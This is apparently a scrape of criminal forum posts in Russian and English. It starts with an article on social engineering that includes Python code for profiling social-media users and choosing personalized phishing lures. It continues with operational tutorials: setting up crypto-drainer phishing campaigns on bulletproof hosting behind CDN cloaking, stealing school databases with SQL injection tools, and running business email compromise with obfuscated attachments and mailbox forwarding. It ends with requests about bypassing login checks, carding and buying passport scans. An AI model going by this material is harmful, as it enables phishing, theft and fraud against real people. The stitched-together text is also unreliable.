Другие промежуточные техники социальной инженерии включают сбор информации,
фрейминг, предтекстинг (см сверху) и холодные звонки. Сбор информации
подразумевает тонкий и косвенный сбор данных у цели. Фрейминг навязывает
информацию в определенном контексте для манипуляции восприятием. Предтекстинг,
также известный как эмоциональное позиционирование, включает создание
вымышленных сценариев для оправдания задаваемых вопросов.
**Продвинутые техники
Эмоциональная манипуляция**
Эмоциональная манипуляция играет важную роль в арсенале социальных инженеров.
Они используют широкий спектр человеческих эмоций, таких как страх,
любопытство и возбуждение, чтобы манипулировать своими целями. Техники, такие
как сбор информации, включают тонкий и косвенный сбор данных, в то время как
фрейминг формирует восприятие цели, представляя информацию в определенном
контексте.
Доверие и авторитет
Социальные инженеры часто принимают на себя роли или идентичности, которые
внушают доверие. Они представляются доверенными коллегами, старшими
руководителями или знающими техниками ИТ, чтобы воспользоваться естественной
склонностью людей подчиняться авторитетным фигурам и следовать социальным
нормам. Этот метод особенно эффективен в средах с жесткой иерархической
структурой, где сотрудники приучены выполнять инструкции от лиц,
воспринимаемых как авторитеты, без лишних вопросов.
Когнитивная эксплуатация
Техники социальной инженерии сильно зависят от когнитивных предвзятостей,
которые являются врожденными ошибками в процессе принятия решений человеком.
Эти предвзятости – побочные продукты тенденции мозга к сокращению времени на
обработку информации, что полезно с точки зрения эволюции, но может быть
использовано в современном киберпространстве. Например, предвзятость
представительности заставляет людей группировать схожие стимулы вместе, что
облегчает злоумышленникам обман их с помощью фишинговых писем, которые кажутся
исходящими от легитимных источников, таких как Apple или Amazon.
Взаимность и социальное доказательство
Предлагая что-то, что имеет явную ценность, например, бесплатное программное
обеспечение или небольшие услуги, социальные инженеры стимулируют инстинкт
взаимности. Когда люди чувствуют, что что-то получили, они с большей
вероятностью ответят взаимностью, что может включать в себя предоставление
конфиденциальной информации или доступ к защищенным системам. Кроме того,
социальные инженеры используют предвзятость социального доказательства,
демонстрируя, что другие уже выполнили их просьбы, что делает более вероятным,
что цель последует их примеру.
Связь и доверие
Установление контакта и формирование связи с целью является мощным
инструментом в социальной инженерии. Злоумышленники могут имитировать общие
интересы, делать комплименты или казаться действительно приятными людьми,
чтобы снизить бдительность жертвы. Это повышает готовность сотрудничать, что
часто приводит к разглашению конфиденциальной информации или выполнению
вредоносных запросов.
Эксплуатация последних тенденций
Социальные инженеры также используют последние тенденции и новости, чтобы их
атаки выглядели более убедительно. Например, предвзятость к недавним событиям
заставляет людей придавать большее значение последним событиям или информации.
Вовремя подстроив свои атаки под последние события или новости, социальные
инженеры увеличивают вероятность того, что их запросы будут приняты без
должной проверки. Кроме того, предвзятость к излишней уверенности – склонность
переоценивать свои способности и суждения – может заставить цели думать, что
они слишком умны, чтобы попасться на уловки, делая их более уязвимыми для
манипуляции.
Продвинутые инструменты и технологии
Недавние достижения в области генеративного искусственного интеллекта (ИИ)
вызывают растущую озабоченность в области социальной инженерии. ИИ может быть
использован злоумышленниками для создания высокоразвитых кампаний угроз,
которые манипулируют человеческим поведением с большей точностью.
Автоматизированный сбор данных и создание реалистичного, контекстно-
специфического контента дополнительно повышают эффективность этих
манипулятивных схем, делая их все труднее распознать и сопротивляться им.
Роль социальных сетей
Социальные сети значительно трансформировали ландшафт социальной инженерии,
предоставив киберпреступникам новые платформы для осуществления своей
деятельности. В отличие от традиционных средств коммуникации, таких как
электронная почта и телефон, социальные сети особенно подходят для атак
социальной инженерии из-за их повсеместного использования и огромного
количества личной информации, которой пользователи делятся в этих сетях.
Социальные сети как инструмент фишинга
Социальные сети стали предпочтительным средством для киберпреступников для
проведения фишинговых атак, известных как "социальный фишинг". Эти атаки могут
включать захват учетных записей, имитацию, мошенничество и распространение
вредоносного ПО. Выявление и устранение этих угроз сложнее, чем традиционные
методы, так как социальные сети существуют вне периметра сети. Например, в
2014 году государственные акторы угроз провели масштабные атаки через
социальные сети на компанию Microsoft, затронув несколько аккаунтов в Twitter
и раскрыв пароли и электронные адреса десятков сотрудников Microsoft. Согласно
Kaspersky Lab, в первом квартале 2018 года было зафиксировано более 3,7
миллионов фишинговых попыток, направленных на поддельные страницы социальных
сетей, 60% из которых были поддельными страницами Facebook.
Психологическое профилирование и влияние социальных сетей
Современные социальные инженеры используют психологическое профилирование,
чтобы лучше понять свою целевую аудиторию. Это помогает настроить сообщения
для максимального воздействия. Социальные сети играют ключевую роль в этом
процессе, позволяя злоумышленникам собирать обширные данные о людях, которые
могут быть использованы для прогнозирования поведения и принятия решений. Рост
влияния социальных сетей добавил новый измерение в социальную инженерию, где
онлайн личности используют свое присутствие, чтобы вдохновлять действия,
изменять восприятие и привлекать внимание к различным социальным вопросам.
Эволюция тактик
Принципы дефицита и срочности часто используются социальными инженерами для
манипулирования людьми, заставляя их принимать поспешные решения. Создавая
ложное чувство дефицита или срочности, злоумышленники могут вызвать
немедленные действия, обходя рациональное суждение и критическое мышление. Эта
техника не только подрывает процесс принятия решений, но и вызывает вопросы о
этических последствиях манипулирования человеческой психологией для достижения
злонамеренных целей.
Угроза социальной инженерии выходит за рамки индивидуальной или организационной безопасности, создавая риски для политической стабильности и свободного, независимого дискурса. Манипуляция информацией на платформах социальных сетей, как показано в скандале с Cambridge Analytica, подчеркивает, как социальная инженерия может быть использована для влияния на общественное мнение и результаты выборов.
Автоматическая разведка и ИИ
Появление инструментов ИИ еще больше усложнило ландшафт социальной инженерии.
ИИ может быстро собирать разведывательные данные о целях, сканируя источники
данных, такие как социальные сети, что может быть использовано для улучшения
тактик социальной инженерии. Это делает их выполнение целевых кампаний
быстрее, проще и дешевле, оставляя организации и отдельных лиц в борьбе за
защиту своих оборонительных механизмов.
В этом случае, можно представить примерную структуру автоматизации.
Python:Copy to clipboard
import numpy as np
import pandas as pd
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler
import networkx as nx
import nltk
from nltk.sentiment import SentimentIntensityAnalyzer
import random
import time
class AdvancedSocialMediaAnalyzer:
def __init__(self):
self.user_graph = nx.Graph()
self.kmeans = KMeans(n_clusters=5, random_state=42)
self.scaler = StandardScaler()
self.sia = SentimentIntensityAnalyzer()
nltk.download('vader_lexicon', quiet=True)
def load_data(self, file_path):
self.data = pd.read_csv(file_path)
self.process_data()
def process_data(self):
# граф пользователей
for _, row in self.data.iterrows():
self.user_graph.add_node(row['user_id'], posts=row['posts'], followers=row['followers'])
# связи между пользователями
for _, row in self.data.iterrows():
friends = eval(row['friends'])
for friend in friends:
self.user_graph.add_edge(row['user_id'], friend)
# данные для кластеризации
features = self.data[['posts', 'followers', 'engagement_rate']].values
self.scaled_features = self.scaler.fit_transform(features)
def cluster_users(self):
self.kmeans.fit(self.scaled_features)
self.data['cluster'] = self.kmeans.labels_
def analyze_sentiment(self, text):
return self.sia.polarity_scores(text)['compound']
def generate_personalized_content(self, user_id):
user_data = self.data[self.data['user_id'] == user_id].iloc[0]
cluster = user_data['cluster']
sentiment = self.analyze_sentiment(user_data['last_post'])
content_templates = {
0: "Привет! Мы заметили, что вы интересуетесь {interest}. У нас есть отличное предложение для вас!",
1: "Привет, в хомяке раздают аирдроп, хочешь расскажу как получить?",
2: "Важное сообщение! Мы обнаружили подозрительную активность в вашем аккаунте. Пожалуйста, подтвердите свою личность.",
3: "Поздравляем! Вы выиграли в нашем ежемесячном розыгрыше. Нажмите здесь, чтобы получить приз.",
4: "Эксклюзивное предложение только для вас! Ограниченное по времени, действуйте сейчас!"
}
content = content_templates[cluster].format(interest=random.choice(eval(user_data['interests'])))
return content
def simulate_attack(self, num_targets=10):
targets = self.data.sample(n=num_targets)
for _, target in targets.iterrows():
content = self.generate_personalized_content(target['user_id'])
success_probability = self.calculate_success_probability(target)
print(f"Атака на пользователя {target['user_id']}:")
print(f"Контент: {content}")
print(f"Вероятность успеха: {success_probability:.2f}")
print("---")
time.sleep(1)
def calculate_success_probability(self, target):
centrality = nx.degree_centrality(self.user_graph)[target['user_id']]
sentiment = self.analyze_sentiment(target['last_post'])
engagement = target['engagement_rate']
# Комбинируем факторы для расчета вероятности успеха
probability = (centrality * 0.3 + (sentiment + 1) * 0.2 + engagement * 0.5) / 2
return min(max(probability, 0), 1) # Ограничиваем значение от 0 до 1
# Использование класса
analyzer = AdvancedSocialMediaAnalyzer()
analyzer.load_data("social_media_data.csv")
analyzer.cluster_users()
analyzer.simulate_attack(num_targets=5)
Код пытается анализировать несколько ключевых факторов:
А также, ИИ может легко составить письмо (даже без джейлбрэйков), чтобы упростить процесс СИ через письма. Например, отправим промпт:
Получаем неплохое письмо:
А если приложить дальнейшие усилия и адаптировать ИИ в диалоге такого стиля, можно творить и более креативные емейлы, например:
Итог:
Политическое и социальное воздействие
Распространение и повторное распространение новостных статей в социальных
сетях, наряду с размещением тонких рекламных объявлений, петиций и
политических сообщений, могут приводить к политическим искажениям. Это может
привести к утрате доверия к политическим системам, потенциально приводя к
избранию экстремистских политических партий или результатам референдумов,
которые ставят под сомнение существующие политические и экономические
структуры, такие как Brexit. Более того, способность злоумышленников
использовать человеческое доверие и вносить дезинформацию в публичные дискурсы
может значительно подорвать общественную гармонию, поляризовать сообщества и
отвлечь ресурсы от законного освещения новостей к опровержению ложных
заявлений.
Статистика использования социальных сетей
Влияние социальных сетей на социальную инженерию подчеркивается их массовым
распространением. В 2005 году только около 7% взрослых американцев
использовали социальные сети. К 2017 году этот показатель вырос до 80% только
для Facebook. В глобальном масштабе примерно 3,5 миллиарда человек активно
используют социальные сети. Ежедневная активность на этих платформах включает
в себя публикацию 500 миллионов твитов, обмен более 10 миллиардами единиц
контента на Facebook и просмотр более миллиарда часов видео на YouTube.
Кевин Митник
Одной из самых известных фигур в истории социальной инженерии является Кевин
Митник. Некогда самый разыскиваемый киберпреступник в США, Митник стал
беглецом в 1992 году после нарушения условий условного освобождения за
предыдущие киберпреступления, прослушивая голосовые сообщения следивших за ним
властей. Митник известен тем, что популяризировал концепцию "социальной
инженерии" в 1990-х годах, манипулируя пользователями и системами с помощью
хитроумных уловок и обмана.
Его книга "Искусство обмана: Управление человеческим элементом безопасности", опубликованная в 2013 году, предоставляет всесторонний обзор методов социальной инженерии и его личного опыта.
Сьюзан Хэдли
В конце 1970-х и начале 1980-х годов Сьюзан Хэдли, также известная как Сьюзан
Тандер, стала известной благодаря своему мастерству в социальной инженерии,
предтексте и психологическом подрыве. Хэдли славилась своей способностью
манипулировать людьми, чтобы выведывать у них конфиденциальную информацию,
демонстрируя раннее использование социальной инженерии для эксплуатации
человеческих уязвимостей.
Братья Бадир
Братья Бадир, Рами, Мухзер и Шаддл Бадир, были слепы от рождения, но в 1990-х
годах сумели организовать масштабную схему телефонного и компьютерного
мошенничества в Израиле. Их деятельность включала социальную инженерию,
"вишинг" и использование компьютеров с Брайлем для обмана и манипуляций над
жертвами.
Фрэнк Абигнейл
Фрэнк Абигнейл – ещё одна выдающаяся фигура в мире социальной инженерии.
Известный своими подвигами в качестве мошенника, Абигнейл использовал техники,
такие как предтекст и кража личности, чтобы совершать разнообразные
мошенничества. Его жизненная история была популяризирована в фильме "Поймай
меня, если сможешь", который подчеркивает его навыки в обмане и манипуляции.
Взлом данных RSA
Значительный пример социальной инженерии, приведшей к крупному нарушению
безопасности, произошёл в 2011 году со взломом данных RSA. Злоумышленники
отправили два фишинговых письма в течение двух дней группе сотрудников RSA с
темой "План найма на 2011 год". Письма содержали заражённый документ Excel,
эксплуатировавший уязвимость Adobe Flash (CVE-2011-0609), что привело к
компрометации систем безопасности RSA.
Взлом данных Target
В 2013 году компания Target подверглась масштабному взлому данных, начавшемуся
с того, что сторонний поставщик стал жертвой фишингового письма. Письмо
содержало троян, который позволил злоумышленникам получить доступ к системе
точек продаж (POS) Target. Этот взлом привёл к краже 40 миллионов данных
кредитных карт, подчёркивая далеко идущие последствия успешных атак социальной
инженерии.
Будущее атак социальной инженерии обещает значительно развиваться, чему будет способствовать сочетание сложных тактик и передовых технологий. Взглянув вперёд, можно выделить несколько ключевых тенденций, которые будут формировать ландшафт этих атак.
Характер атак социальной инженерии станет более сложным, поскольку злоумышленники будут применять детализированные стратегии, адаптированные к их конкретным целям и условиям. Тактики социальной инженерии, вероятно, продолжат использовать как прямые, так и обратные стратегии, когда злоумышленники либо напрямую связываются с целями, либо побуждают их к контакту под видом законности. Интеграция подцелей и дополнительных уловок ещё больше усложнит эти методы атак, делая их трудными для обнаружения и противодействия.
Искусственный интеллект (ИИ) уже оказывает значительное влияние на область социальной инженерии, и его влияние, вероятно, будет расти. ИИ-инструменты, включая генеративный ИИ, используются для создания высокоперсонализированных и убедительных векторов атак. Например, ИИ может анализировать изображения и другие данные, чтобы настраивать фишинговые письма, которые соответствуют интересам и поведению получателя. По мере развития технологий ИИ, создание дипфейков в реальном времени может стать распространённым инструментом, вынуждая бизнес адаптировать свои политики безопасности.
Компрометация деловой почты (BEC) ожидает рост, особенно за счёт более сложных фишинговых тактик. Злоумышленники, вероятно, будут нацеливаться на цепочки поставок и сторонних поставщиков, используя эти точки входа для доступа к более крупным сетям и потенциально более ценным целям. Кроме того, компании с большими финансовыми ресурсами, такие как те, кто застрахован от киберугроз, могут стать первичными целями из-за их высокой вероятности оплаты выкупов.
Мировые социально-экономические условия, которые становятся всё более нестабильными, будут продолжать влиять на кибербезопасность. Эта нестабильность может создавать плодотворную почву для атак социальной инженерии, поскольку злоумышленники используют экономическую неопределённость для более эффективной манипуляции жертвами. С распадом крупных группировок- вымогателей и появлением новых акторов, применяющих свежие тактики, ландшафт кибербезопасности останется турбулентным.
Угрозы социальной инженерии будут расти вместе с внедрением новых технологий, таких как Интернет вещей (IoT), мобильные коммуникации и носимые устройства. Распространение этих технологий увеличивает количество доступной информации, упрощая процесс сбора разведданных для целевых атак. Кроме того, социальная инженерия становится более эффективной и автоматизированной, позволяя злоумышленникам достигать больших групп целей и создавать более правдоподобные атаки.
В этой статье были рассмотрены практически все методы СИ, от самых простых и прямолинейных до самых продвинутых и сложных. Также, были представлены примеры кодов, которые комбинировали техники и использовали в комбинации машинное обучение для полной автоматизации. Заранее извиняюсь за изображения))) кривоваты, ИИшные. Но думаю они хорошо дополняют эту статью.
Есть таргет novo.co. Если делать под него токенку то после ввода otp кода , он так же отправляет ссылку на почту (если устройство незнакомое). Эту ссылку нужно открыть в том же браузере в котором и просходит логин. Если открыть в другом смотрите скрин 4.
Собвственно вопрос возможно ли это как то обойти при помощи evilginx, evilnovnc? Там же как я понимаю их сервер будет видеть так же запросы от нашего ип , а не от ип холдера и устройство так же будет новым. Поэтому так же отправит ссылку на почту дополнительно.
Вопрос как эту суку фишить?
Делать допом фиш под gmail и другие почты и просить их бредовая идея конверсия
просядет. Так же вставлять ссылку с почты тоже такая себе затея.
За хорошую подсказку монетка.
There is a target novo.co. If you make a token for it, after entering the otp code, it also sends a link to the mail (if the device is unfamiliar). This link should be opened in the same browser in which the login takes place. If you open it in another browser, see screen 4.
The question is whether it is possible to bypass it with the help of evilginx, evilnovnc? There as I understand their server will see as well requests from our ip, not from the ip holder and the device will also be new. Therefore, it will also send a link to the mail additionally.
The question is how to phish this bitch?
Make an additional phish under gmail and other mail and ask them to delusional
idea conversion will drop. Also insert a link from the mail is also such an
idea.
For a good clue coin.
WHAT IS DRAINER AND HOW ATTACKERS LAUNCH THEIR CAMPAIGNS TO GET TARGETS RESULTS
A "crypto drainer" refers to a type of malicious software or technique used by cybercriminals to steal cryptocurrency from a user's wallet. There are several methods and tools that can be classified under this term, each exploiting different vulnerabilities or social engineering tactics. Here are some common forms of crypto drainers:
Phishing Scams: Fake websites or emails that mimic legitimate cryptocurrency services to trick users into revealing their private keys or passwords.
Malware: Software that can infect a user's device, often via malicious downloads or compromised websites, to steal wallet credentials or intercept cryptocurrency transactions.
Keyloggers: Programs that record keystrokes to capture sensitive information such as private keys or passwords when the user enters them.
Clipboard Hijackers: Malware that monitors the clipboard for cryptocurrency addresses and replaces them with addresses controlled by the attacker.
Fake Wallet Apps: Malicious applications posing as legitimate cryptocurrency wallets to steal funds when users transfer their assets into these fake wallets.
Browser Extensions: Malicious or compromised browser extensions that can interfere with cryptocurrency transactions or steal private information.
Here: We help some members with 1 targets methodology for email phishing campaign..
What We Need For This Two Methods Tutorial : ?
-A
Crypto drainer script auto transactions user crypto wallet asset: "Script-
page"
-A
Crypto Fake web3 script-page to gain full access with "private keys" to
transactions all type of crypto assets in the user wallets: "Scam-page"
-A
Mailer Script that support spoof email campaign: "Sender-Mailer"
-A
Window 10 or 11 virtual RDP, Your rdp provider must support illegal
activities.
-A
Smtps: you can use created self-host or hacked smtp portal.
-A
Open redirect handling url to hide your spoof target url.. there are many
resources to find open redirect like "bing, google, awstrack"
etc.
-A
Anti-bot-apikey fake or Webroot blocker to make your link hide from bad bot or
fake machine user's host:
-A
Crypto web3 page Template file to implement your target crypto steal link in
web3 click button. and for target: Where you can get this? any cyberguys store
or clone any web3 crypto html webpage and edit it yourself and add your
drainer link in click bottom:
1-A
Bulletproof VPS to install hosting Panel:
2-A
Fast Flux domain's DNS provider or buy domain from flokinet, etc..!
3-A
Content delivery network aka(CDN-DNS):
4-A
Contacts List from hacked database from newsletter website's talking about
crypto related or school website's like usagov.edu or gov.edu.ca buy from
legit seller then extract the phone number, email, name. and valid phone
number with mobile carrier isp type and valid debounce mailbox bad email:
-A
html letter design for your need:
-A
Spam-words checker tool:
-A
Email write-AI to compose your html letter contents words:
-A
sms mailer that support spoof + email to sms smtp support server:
-A
WhatsApp bot source code can be found on GitHub and meta developer account:
-A
Business WhatsApp account created with esim number needed:
IN this Thread, i won't explain how to deploy all this tools in this thread
and setup due to security researcher on darkweb. i will explain the main part
of your success result and how to backend domain & IP vps to avoid flag page
or domain suspend: in section
1-A
to
4-A
of our tools list
above...!
Next: How to get our VPS and Configure and install best hosting Control-
Panel
1-A:
Get good bulletproof Linux-vps 8gb, 4cpu ubuntu-18.04, 20.04, 22.04, 24.04 or
Debian: 9, 10, 11, 12. from trusted provider "BPH" after purchased and
received your order example> user:root, pass:xssadmin2023jun24,
IP:194.548.48.12.
download cmder is a Unix cmd tool is free online google it. i hate putty. sorry my bad to window putty user's
Here we login to our linux-vps as
For beginner is good to know what you are doing in command-line "What is ufw"
UFW (Uncomplicated Firewall) is a command-line interface tool for managing and configuring the firewall on Unix-like operating systems, particularly Linux. It is designed to simplify the process of setting up and managing a firewall, making it more accessible for users who may not be familiar with more complex firewall tools like iptables.
Here are some key features and functions of UFW:
Simplicity: UFW provides a straightforward way to manage firewall rules, focusing on ease of use without requiring deep technical knowledge of networking.
Basic Commands:
ufw enable: Activates the firewall.
ufw disable: Deactivates the firewall.
ufw status: Displays the current status of the firewall and active rules.
ufw allow [port/service]: Allows traffic on a specified port or service.
ufw deny [port/service]: Denies traffic on a specified port or service.
ufw delete [rule]: Deletes an existing rule.
Logging: UFW can be configured to log all blocked or allowed traffic for
monitoring and troubleshooting purposes.
IPv6 Support: UFW supports both IPv4 and IPv6.
Profiles: UFW supports application profiles, making it easier to allow or deny traffic for common applications.
Integration: UFW integrates well with various Linux distributions and is often the default firewall management tool on distributions like Ubuntu.
Example Usage
Enable UFW:
Bash:
sudo ufw enable
Allow SSH Traffic:
sudo ufw allow ssh
Deny a Specific Port:
sudo ufw deny 8080
Check Firewall Status:
sudo ufw status
Delete a Rule:
sudo ufw delete allow 22
UFW is a powerful tool that makes firewall management more accessible,
allowing users to protect their systems with minimal effort.
If you know what you are doing and all should go successfully. proceed to hostname configuration.
here we can use free domain as hostname or if you have money you can buy. never use dynamic domain like changeip.com or noip.com i notice some guys still using them for spamming setup .
Your hostname command-line-:$ hostnamectl set-hostname node.xsswebpanel.tls then hit enter and also go to your vps control dashboard to add your hostname- domain. after done install this free hosting control panel called fastpanel. only if you know what you are doing..
Here is our installing commandline-bash:$
bash:$ apt-get update; apt-get install wget
bash:$ wget http://repo.fastpanel.direct/install_fastpanel.sh -O - | bash -
After installation done you will see this messages on your screen:
Congratulations! FASTPANEL successfully installed and available for you at
https:node.xsswebpanel.tls:8888
Login: fastuser
Password: password
First change your control-panel login key:
exit the session after install and use this command:
bash:$ passwd user_name >"fastuser" hit enter
Then it will require you to insert new password: yourkey2024june27 hit enter done then copy your hostname domain:8888 to browser and login with your user fastuser and passkey2024june27 boom logged...!
Next: What 's DNS How to configure for our phishing Tutorial...!
2-A:
DNS (Domain Name System) is a fundamental component of the internet that translates human-readable domain names (("like www.xss.is")) into IP addresses ((like 192.45.29.187)) that computers use to identify each other on the network. This system allows users to access websites and other resources using easy-to-remember names rather than numerical IP addresses.
Here: are some key points about DNS:
Hierarchical Structure: DNS operates in a hierarchical manner. At the top are the root name servers, followed by top-level domain (TLD) servers ((like .com, .org is. ru. is. icu)), and then authoritative name servers for specific domains.
DNS Records: DNS uses various types of records to provide information about a domain, including:
A Record: Maps a domain to an IPv4 address.
AAAA Record: Maps a domain to an IPv6 address.
CNAME Record: Alias record that maps one domain name to another.
MX Record: Mail exchange record that directs email to a mail server.
TXT Record: Allows the domain owner to store arbitrary text, often used for
verification and security purposes.
Resolvers: DNS resolvers (often provided by ISPs) act as intermediaries that
query the DNS hierarchy to resolve domain names for end users.
Caching: DNS responses are often cached by resolvers and clients to improve performance and reduce the load on DNS servers.
Security: DNS has vulnerabilities and can be targeted by attacks such as DNS spoofing and cache poisoning. DNSSEC (Domain Name System Security Extensions) is a set of protocols designed to secure information provided by DNS.
How DNS Works
DNS Query: When you type a URL into your browser, your computer sends a DNS
query to a resolver.
Resolver Query: The resolver checks its cache. If the requested domain is not cached, it queries the root name servers.
Root Servers: The root name servers respond with the address of the TLD name servers.
TLD Servers: The resolver then queries the TLD name servers, which respond with the address of the authoritative name servers for the requested domain.
Authoritative Servers: The resolver queries the authoritative name servers, which respond with the IP address of the requested domain.
Response to Client: The resolver caches the response and returns the IP address to the client, which can then establish a connection to the desired website.
Here: we won't use our domain provider's DNS. we will use nameserver exchange DNS. what i mean we are going to use CDN-DNS to backend domain to avoid anti- spam flag red. So that our domain to remain active for a longer period of time before being detected by anti-spam bots or security researchers found our evil phishing link domain..! Many beginners or intermediate spammer's send phishing to professional IT expert or security researcher emails and They expect their domain link to stay long period of time without domain flag red or domain suspended..! Ok ok
Next:**Let 's backend our domain with CDN-DNS..! **
3-A:
What's CDN
A content delivery network ((CDN)) or content distribution network is a geographically distributed network of proxy servers and their data centers. The goal is to provide high availability and performance by distributing the service spatially relative to end users.
How CDN DNS Works
DNS Resolution: When a user tries to access a website
((www.xss.is)), their device initiates a DNS query to
resolve the domain name to an IP address.
CDN's Role:
The CDN is configured to handle the domain’s DNS resolution.
The DNS query is routed to the CDN’s DNS infrastructure, which uses
sophisticated algorithms to determine the best edge server to handle the
request.
Geographic and Performance-Based Routing: The CDN’s DNS server considers
factors such as the user’s geographic location, current server loads, and
network conditions to decide which edge server should respond to the request.
Edge Server Response: The CDN’s DNS server returns the IP address of the selected edge server to the user’s device.
Content Delivery: The user’s device connects to the edge server to fetch the requested content. This server is typically the closest or the one with the best performance characteristics for the user’s location.
How To set up CDN-DNS for our phishing website domain:
DNS Configuration: Update the domain’s DNS settings to use the CDN’s DNS servers. This usually involves changing the DNS records (such as CNAME or A records) to point to the CDN’s domain or IP addresses.
Let's start by heading to our domain provider to find the nameserver to swap with our CDN record. Next, we return to our CDN-DNS dashboard to set up the site, where we'll be prompted to input the IP of our VPS bulletproof hosting. Once we add it along with a record, we click proceed based on the type of CDN- DNS provider we've chosen. After pointing your domain and IP, a namerserver record will be generated for you, such as ((xssis.cloudflare.com & xssadmi.cloudflare.com)). Copy this record and paste it into your domain provider's nameserver settings, then save. Finally, return to your CDN-DNS dashboard, click continue to verify the DNS exchange, and once it's active, however make sure to check mark proxied.
CDN-DNS Settings: go to CDN-DNS Create rules for your domain, SSL/TLS settings, and performance optimizations, Bots security challenges, etc.
Security Policies: Set up security measures provided by the CDN, such as DDoS protection and WAF rules. xD
Next: How to hacked school website database like ((email, name, mobile
number)).
4-A:
Let's talk about sql-injection and google dork.
my favorite sql-injection is ((ghauri)) is an advanced cross-platform tool
that automates the process of detecting and exploiting SQL injection security
flaws:
How To Install:
Run the following commands in the terminal:
bash:$ git clone https://github.com/r0oth3x49/ghauri.git
bash:$ cd ghauri/
bash:$ python3 -m pip install — upgrade -r requirements.txt
bash:$ python3 setup.py install
You might face some module issue after run bash:>$ python3 setup.py install ..: Create virtual environment and Activate python venv.
Next: find sql-dork-scanner script to find vulnerable website url edu websites lists.txt.
If you don't have SQL-Website IT security skills then you can search online where to buy edu/crypto newsletter website hacked database file.
<------END------>
THANKS SO MUCH FOR READING
Happy Phishing My XSS.IS MEMBER'S WISH ALL GOOD LUCK BULK OF RESULTS:
I will write thread on how to crack companies host to get smtps with free open source tool
<-----sECURITY Note--------->
To protect against crypto drainers, users should:
Always verify the authenticity of websites and applications.
Use hardware wallets for better security.
Enable two-factor authentication (2FA) on their accounts.
Keep their software and antivirus programs up to date.
Be cautious of unsolicited emails and messages, especially those requesting
sensitive information.
<-----sECURITY Note--------->
Всем привет. Блокируют ли регистраторы домен ,который переадресует юзера автоматически на сайт где есть фишинг?
Hello xss.is Fam's
I promised some member's i will post the real threads about (BEC: Business
Email Compromise) weeks ago. in private chats.
What 's BEC?
Business email compromise (BEC) is another scam that relies heavily on social
engineering techniques. In a BEC attack, a scammer impersonates a trusted
company executive. civil engineering contractor or third-party vendor's to
initiate financial invoice transfers to an account they own. This can be done
from office365 mailbox or any business emails like GoDaddy, Alibaba cloud
business webmail, ETC.
For example, they may pretend to be a security vendor updating your cloud business emails instructions. The hacker would send a detailed email from an address that appears legitimate to the person within the organization who typically makes payments in mailbox. If the recipient of the email follows the instructions, the money they send will end up in the scammer's bank account. I won't go into detail here, as there are threads on BEC from the ([ Microsoft security team that you can read to gain a deeper understanding of how BEC works](https://www.microsoft.com/en-us/security/business/security-101/what-is- business-email-compromise-bec) ). Some members are looking to profit from BEC, as BEC spammers can make more money than bank or credit card spammers. However, BEC spamming requires a lot of time, patience, and knowledge to successfully cash out. You'll need to monitor the hacked BEC logs in your mailbox for several days or weeks. Once you see an invoice payment initiated in your mailbox logs, you'll need to create a clone email address ID. I personally used a Proton Plus account to set up my hosting webmail for the clone mailbox address ID with Office365. I then configured email forwarding in the victim's mailbox settings. It's important to be cautious with your activities in the victim's mailbox, as any suspicious behavior could prompt them to change their passwords. (Here is a recently screenshot of a BEC Office365 hacked log mailbox .) Is good to understand Social engineering cyber attacks can involve baiting, spear phishing, pretexting, and more.
WHAT DO I NEED TO BE SUCESSFUL BEC SPAMMER?
Here is the things you need to be successful spammer and got results.
1- Your brain
2- Dedicated time
3- Patience needed: because you might fail first spamming attempt do not allow
any spammer fool you that you will get bulks results in their first setup for
you as beginner. many companies this days has security Intelligence that guide
them before they proceed any activities in their mailbox.
Here: is basic Tools You needs.
Fresh
Html Letter coded + scan code qr with obfuscator.
Html
Attachment offline login file.html example( offline html attachment
proof )
You
need strong obfuscator system (To OBF your html,js,css against window
antivirus system and Microsoft outlook-0365-protection to avoid warning victim
downloading file.html as phishing harmful file.)
Quality
leads validated with debounce checker mailbox
Google
cloud free account (To make perfect inbox link bypass against spam-filter or
smtp isp bot filtering).
Open
redirect url handling can be found on awstrack. or (use GitHub tool to find
open redirect url to hide your link)
Office365
Validator Script 90% or 99% real userid valid.
Bulletproof
VPS to make your hosting panel. Never use hacked shell or hacked cpanel. i
dont use them or make your
choice.
Smart-
Link(API-BOT) fake host machine blocker, web root blocker, bot url visitor
blocker. to manage your url this good because you can replace ban domain from
spamhaus. without make new spamming and continue getting more results. never
use antibot.pw they are useless.
Mailer
Script that support spoof. like Python MSS or node.js MSS
CDN-
DNS to backend your domain and vps IP. check my thread here how to setup host
with CDN-DNS(####)
Spam
words checker use this tool>( spam-words-
checker )
Subject
encoded user this tool>( Subject
Encoded )
Email-
AI writer also good, it help use this tool>( Email-AI-free
tool )
Trusted
Anonymous DNS provider's (custom domain is cool, but setup subdomain from
management)
You
can also spam box to box: if you have hacked office365 log with good contacts
to do box to box spamming with your phishing attachment offline file.html. you
need outlook extention tool for this aspect with your brain. however i can't
post details about this here due to security researchers on forum.
Is there a way to find someone’s email address or social media accounts through is wallet address?
Есть ли вариант сделать онлайн на левые документы банк любой из этих стран?
Австралия
Новая Зеландия
Индонезия
Тайланд
Малайзия
Сингапур
Великобритания
Чтобы принимать сюда бабки и потом выводить в крипту.
Привет! Интересует как создается мерч и тд.? На сколько я раньше понимал,
данные карты приходят в бота вбивера, а вбивер потом вбивал это все в пост
терминале.
Возможно ли вбивать без пост терминала и как это происходит, и что нужно для
этого?
Спасибо.
кто знает где можно купить сканы паспортов людей и какова у них цена+кто нибудь смог бы объянсить как углубится в низ интернета для поиска нужных разделов
You must have at least 30 reaction(s) to view the content.
You must have at least 3 message(s) to view the content.
Как то собирают логин пароли банковских аакаунтов.
А что там за траф?
По каким целевым запросам продвигают что бы снимать?
Я так понимаю нужна программа которая отличает нужные бины банков которые дают возможность входа без авторизации через смс.
Или же можно провести авторизацию прямо на шопе получив смс типа как для ОТР платежа на шопе, но на самом деле для входа в банковский аккаунт?
Но в любом случае прога по бинам нужна, что бы знать лого какого банка ставить в пуш, или это не обязательно, и всем показывают один и тот же без лого?
Я могу делать целевой траф на шопы под снятие данных сс, и там уже подставлять
всплывающие окна с запросами войти в аккаунт банка, подтвердить что то там
(или что там обычно пишут).
Если кому то интересно, можем поработать.
Есть у кого фишинг панель для телеграм. Мб слив какой то или тима куда можно
вступить.
Где то видел кто то сливал но потерял линк
What is the difference between using cc on a phone compared to a computer? Is the rate of passing cc through the phone more than the computer? I have seen something like this before, I wanted to write here, if anyone has information, please share it.
**Всем привет. Сегодня расскажу в этой статье свои способы которые приносили и проносят свои плоды по сей день.
~~От вас требую только репутацию взамен)~~
И так приступим.**
